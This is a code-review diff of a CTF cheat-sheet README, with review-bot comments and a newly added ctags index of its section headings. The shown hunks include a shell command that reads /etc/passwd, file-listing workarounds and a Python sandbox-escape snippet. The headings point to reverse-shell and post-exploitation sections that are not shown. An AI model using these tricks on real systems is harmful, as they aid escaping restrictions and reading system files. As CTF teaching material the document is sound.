@ -1362,7 +1388,7 @@ l(DId<j@<?3r@:F%a+D58'ATD4$Bl@l3De:,-DJs`8ARoFb/0JMK@qB4^F!,R<AKZ&-DfTqBG%G
Use Use
* 15 Puzzle * 15 Puzzle
A sliding puzzle that consists of a 4x4 grid with numbered square tiles, with one missing, set in a random order. It was involved in SharifCTF to determine if a group of these puzzles was solvable: [https://theromanxpl0it.github.io/ctf_sharifctf18/fifteenpuzzle/](https://theromanxpl0it.github.io/ctf_sharifctf18/fifteenpuzzle/) A sliding puzzle that consists of a 4x4 grid with numbered square tiles, with one missing, set in a random order. It was involved in SharifCTF to determine if a group of these puzzles was solvable: [https://theromanxpl0it.github.io/ctf_sharifctf18/fifteenpuzzle/](https://theromanxpl0it.github.io/ctf_sharifctf18/fifteenpuzzle/)
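Review bot: the line consisting only of `Use` is a dangling fragment with no sentence following it; either complete it or remove it.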
@ -1386,7 +1412,7 @@ sudo apt install -y caca-utils
* Strange Symbols/Characters * Strange Symbols/Characters
Some CTFs will try and hide a message on a picture with strange symbols. Try and Google Reverse Image searching these. They may be Egyptian Characters: Some CTFs will try and hide a message on a picture with strange symbols. Try and Google Reverse Image searching these. They may be Egyptian Characters:
![http://www.virtual-egypt.com/newhtml/hieroglyphics/sample/alphabet.gif](http://www.virtual-egypt.com/newhtml/hieroglyphics/sample/alphabet.gif) ![http://www.virtual-egypt.com/newhtml/hieroglyphics/sample/alphabet.gif](http://www.virtual-egypt.com/newhtml/hieroglyphics/sample/alphabet.gif)
@ -1411,7 +1437,7 @@ MCA{I$love$bitcoin$so$much!}
* Missing `ls` or `dir` commands * Missing `ls` or `dir` commands
If you cannot run `ls` or `dir`, or `find` or `grep`, to list files you can use If you cannot run `ls` or `dir`, or `find` or `grep`, to list files you can use
``` ```
echo * echo *
@ -1428,11 +1454,11 @@ mapfile -t < /etc/passwd
printf "$s\n" "${anything[@]}" printf "$s\n" "${anything[@]}"
``` ```
Jail Breaks Jail Breaks
---------- ----------
Sometimes you're jailed in an environment where you can potentially execute code. Sometimes you're jailed in an environment where you can potentially execute code.
* Python 3 * Python 3
`().__class__.__base__.__subclasses__()` - Gives access to `object` subclasses `().__class__.__base__.__subclasses__()` - Gives access to `object` subclasses
Trivia Trivia
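Review bot: `printf "$s\n" "${anything[@]}"` expands the (normally unset) shell variable `$s`, so every array element prints as an empty line; the format string should be `"%s\n"`. Also, the `mapfile -t < /etc/passwd` shown in the hunk header names no array, so it fills `MAPFILE`, not `anything`; make the two lines agree on the array name so the example works when pasted.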
@ -1487,7 +1513,7 @@ ICMP
``` ```
* We are a CTF team which is open to everybody. Who are we? * We are a CTF team which is open to everybody. Who are we?
``` ```

42
tags Normal file

@ -0,0 +1,42 @@
!_TAG_FILE_FORMAT 2 /extended format; --format=1 will not append ;" to lines/
!_TAG_FILE_SORTED 1 /0=unsorted, 1=sorted, 2=foldcase/
!_TAG_OUTPUT_FILESEP slash /slash or backslash/
!_TAG_OUTPUT_MODE u-ctags /u-ctags or e-ctags/
!_TAG_PROGRAM_AUTHOR Universal Ctags Team //
!_TAG_PROGRAM_NAME Universal Ctags /Derived from Exuberant Ctags/
!_TAG_PROGRAM_URL https://ctags.io/ /official site/
!_TAG_PROGRAM_VERSION 0.0.0 /a3c87ab5/
1433 (Microsoft SQL Server) README.md /^1433 (Microsoft SQL Server)$/;" s
445 (smb/Samba) README.md /^445 (smb\/Samba)$/;" s
APK Forensics README.md /^APK Forensics$/;" s
Binary Exploitation/pwn README.md /^Binary Exploitation\/pwn$/;" s
CTF-Katana README.md /^CTF-Katana$/;" c
Cryptography README.md /^Cryptography$/;" s
DO NOT FORGET TO JUST BRUTEFORCE JUST THE FIRST BYTE, OR TWO BYTES OR THREE BYTES. README.md /^# DO NOT FORGET TO JUST BRUTEFORCE JUST THE FIRST BYTE, OR TWO BYTES OR THREE BYTES.$/;" c
Esoteric Languages README.md /^Esoteric Languages$/;" s
Excess README.md /^Excess$/;" s
Forensics README.md /^Forensics$/;" s
IF YOU KNOW A DECENT CRIB (PLAINTEXT), USE CYBERCHEF TO HELP DETERMINE THE KEY README.md /^# IF YOU KNOW A DECENT CRIB (PLAINTEXT), USE CYBERCHEF TO HELP DETERMINE THE KEY$/;" c
Jail Breaks README.md /^Jail Breaks$/;" s
Known Exploits README.md /^Known Exploits$/;" s
Microsoft Office Macros README.md /^Microsoft Office Macros$/;" s
Miscellaneous README.md /^Miscellaneous$/;" s
Networking README.md /^Networking$/;" s
PDF Files README.md /^PDF Files$/;" s
PHP README.md /^PHP$/;" s
PNG File Forensics README.md /^PNG File Forensics$/;" s
Port Enumeration README.md /^Port Enumeration$/;" c
Post-Exploitation README.md /^Post-Exploitation$/;" c
PowerShell README.md /^PowerShell$/;" s
Python Reversing README.md /^Python Reversing$/;" s
Retrieving Network Service Hashes README.md /^Retrieving Network Service Hashes$/;" s
Reverse Engineering README.md /^Reverse Engineering$/;" s
SNMP README.md /^SNMP$/;" s
Steganography README.md /^Steganography$/;" s
Table of Contents README.md /^# Table of Contents$/;" c
Trivia README.md /^Trivia$/;" s
VisualBasicScript Reversing README.md /^VisualBasicScript Reversing$/;" s
WHEN GIVEN A FILE TO WORK WITH, DO NOT FORGET TO RUN THIS STEGHIDE WITH AN EMPTY PASSWORD! README.md /^# WHEN GIVEN A FILE TO WORK WITH, DO NOT FORGET TO RUN THIS STEGHIDE WITH AN EMPTY PASSWORD!$/;" c
Web README.md /^Web$/;" s
Windows Executables README.md /^Windows Executables$/;" s
Windows Reverse Shells README.md /^Windows Reverse Shells$/;" s
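Review bot: the new `tags` file is a generated Universal Ctags index (note `!_TAG_PROGRAM_VERSION 0.0.0 /a3c87ab5/`, a local development build) that will go stale every time README.md changes; it should not be tracked. Remove it from this commit and add `tags` to `.gitignore`.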